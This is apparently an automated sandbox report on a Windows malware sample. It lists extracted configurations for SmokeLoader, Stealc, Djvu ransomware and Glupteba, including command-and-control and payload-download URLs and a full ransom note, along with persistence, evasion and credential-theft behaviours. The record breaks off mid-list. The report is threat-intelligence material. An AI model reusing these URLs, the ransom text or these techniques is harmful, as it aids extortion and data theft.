Resubmissions
03-02-2024 11:37
240203-nrgycaaecm 1002-02-2024 19:15
240202-xyamaaddb7 1001-02-2024 20:32
240201-zbg4ysdgc7 1001-02-2024 19:55
240201-ym4lnaddf5 10Analysis
-
max time kernel
1801s -
max time network
1808s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
03-02-2024 11:37
Static task
static1
General
-
Target
file.exe
-
Size
6.3MB
-
MD5
c67cb967230036816fd0cbbfd96959c6
-
SHA1
d2fe988a302dce4bc0f34a1003a623f96a06b250
-
SHA256
d2682ee0fe9e5bf429b7bea89d32cf417c3b684429dbff5e060b07e7335aaa76
-
SHA512
2f51046e44bdfa470f676071c69da8c05d50d8f79e748748f25ac13ec53d346f1c3988148000fea3ece38623fd629d1b3dcc943006e80b7bee95da7f1f42920c
-
SSDEEP
196608:GHqO3grg0lAc4G+JCJjsP8BXkf/hmzJzFYngA13jvHKvj4:GHzCOc4G+oB0BmdFY31zq
Malware Config
Extracted
smokeloader
pub1
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
djvu
http://habrafa.com/test1/get.php
-
extension
.cdcc
-
offline_id
LBxKKiegnAy53rpqH3Pj2j46vwldiEt9kqHSuMt1
-
payload_url
http://brusuax.com/dl/build2.exe
http://habrafa.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-iVcrVFVRqu Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0846ASdw
Signatures
-
DcRat 9 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 2292 schtasks.exe 2404 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation file.exe 1012 schtasks.exe 1716 schtasks.exe 4748 schtasks.exe 228 schtasks.exe 4360 schtasks.exe 2280 schtasks.exe -
Detected Djvu ransomware 7 IoCs
resource yara_rule behavioral1/memory/4544-269-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4544-267-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4544-270-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4544-297-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/560-308-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/560-309-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/560-311-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 11 IoCs
resource yara_rule behavioral1/memory/1236-51-0x0000000002DD0000-0x00000000036BB000-memory.dmp family_glupteba behavioral1/memory/1236-52-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1236-60-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1236-92-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1236-94-0x0000000002DD0000-0x00000000036BB000-memory.dmp family_glupteba behavioral1/memory/1236-142-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1236-206-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4328-216-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4328-254-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4328-313-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4328-381-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner payload 4 IoCs
resource yara_rule behavioral1/files/0x0006000000000743-671.dat family_xmrig behavioral1/files/0x0006000000000743-671.dat xmrig behavioral1/files/0x0006000000000743-676.dat family_xmrig behavioral1/files/0x0006000000000743-676.dat xmrig -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Renames multiple (125) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 216 netsh.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation A9AA.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation nscA4E.tmp -
Executes dropped EXE 32 IoCs
pid Process 1236 d21cbe21e38b385a41a68c5e6dd32f4c.exe 4760 InstallSetup9.exe 5064 toolspub1.exe 1744 BroomSetup.exe 3748 nscA4E.tmp 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 4228 917D.exe 4868 A9AA.exe 4544 A9AA.exe 1636 A9AA.exe 560 A9AA.exe 5092 csrss.exe 5112 EB67.exe 3332 injector.exe 2648 windefender.exe 5116 windefender.exe 3060 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 3468 wup.exe 3344 csrss.exe 2756 713674d5e968cbe2102394be0b2bae6f.exe 4012 1bf850b4d9587c1017a75a47680584c4.exe 4424 istwtus 1768 A9AA.exe 2396 A9AA.exe 2140 A9AA.exe 3604 A9AA.exe 3916 istwtus 1116 A9AA.exe 3212 A9AA.exe 1504 A9AA.exe 2328 A9AA.exe 1364 istwtus -
Loads dropped DLL 5 IoCs
pid Process 4760 InstallSetup9.exe 4760 InstallSetup9.exe 3748 nscA4E.tmp 3748 nscA4E.tmp 4760 InstallSetup9.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1664 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0003000000000715-499.dat upx behavioral1/files/0x000a000000000737-652.dat upx behavioral1/files/0x0008000000000745-707.dat upx behavioral1/files/0x0008000000000745-708.dat upx behavioral1/files/0x0008000000000749-759.dat upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7841c372-3e30-4020-96a1-4c6d427fa8f3\\A9AA.exe\" --AutoStart" A9AA.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11156 raw.githubusercontent.com 11157 raw.githubusercontent.com -
Looks up external IP address via web service 16 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23589 api.2ip.ua 27353 ipinfo.io 27351 ipinfo.io 27362 ipinfo.io 31054 api.2ip.ua 14 api.2ip.ua 8853 api.2ip.ua 14241 api.ipify.org 23596 api.2ip.ua 31013 api.2ip.ua 77 api.2ip.ua 4796 ip-api.com 14243 api.ipify.org 15912 api.2ip.ua 75 api.2ip.ua 19296 api.ipify.org -
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 4868 set thread context of 4544 4868 A9AA.exe 112 PID 1636 set thread context of 560 1636 A9AA.exe 121 PID 1768 set thread context of 2396 1768 A9AA.exe 178 PID 2140 set thread context of 3604 2140 A9AA.exe 184 PID 1116 set thread context of 3212 1116 A9AA.exe 195 PID 1504 set thread context of 2328 1504 A9AA.exe 200 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\rss d21cbe21e38b385a41a68c5e6dd32f4c.exe File created C:\Windows\rss\csrss.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5096 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2596 560 WerFault.exe 121 4412 5112 WerFault.exe 128 -
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 917D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI istwtus Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 917D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 917D.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nscA4E.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nscA4E.tmp -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1012 schtasks.exe 228 schtasks.exe 4360 schtasks.exe 1716 schtasks.exe 2280 schtasks.exe 2292 schtasks.exe 2404 schtasks.exe 4748 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1680 timeout.exe -
GoLang User-Agent 12 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 4728 Go-http-client/1.1 HTTP User-Agent header 6030 Go-http-client/1.1 HTTP User-Agent header 6068 Go-http-client/1.1 HTTP User-Agent header 16572 Go-http-client/1.1 HTTP User-Agent header 16580 Go-http-client/1.1 HTTP User-Agent header 22215 Go-http-client/1.1 HTTP User-Agent header 167 Go-http-client/1.1 HTTP User-Agent header 169 Go-http-client/1.1 HTTP User-Agent header 27213 Go-http-client/1.1 HTTP User-Agent header 33912 Go-http-client/1.1 HTTP User-Agent header 4727 Go-http-client/1.1 HTTP User-Agent header 22210 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1912 = "Russia TZ 10 Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" d21cbe21e38b385a41a68c5e6dd32f4c.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5064 toolspub1.exe 5064 toolspub1.exe 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found 3540 Process not Found -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 5064 toolspub1.exe 4228 917D.exe 4424 istwtus 3916 istwtus 1364 istwtus -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4320 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 1236 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeImpersonatePrivilege 1236 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 4992 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 5056 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 4676 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 4804 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 640 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 3420 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeSystemEnvironmentPrivilege 5092 csrss.exe Token: SeSecurityPrivilege 5096 sc.exe Token: SeSecurityPrivilege 5096 sc.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 4372 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 4500 powershell.exe Token: SeLockMemoryPrivilege 3468 wup.exe Token: SeDebugPrivilege 4976 powershell.exe Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 1804 powershell.exe Token: 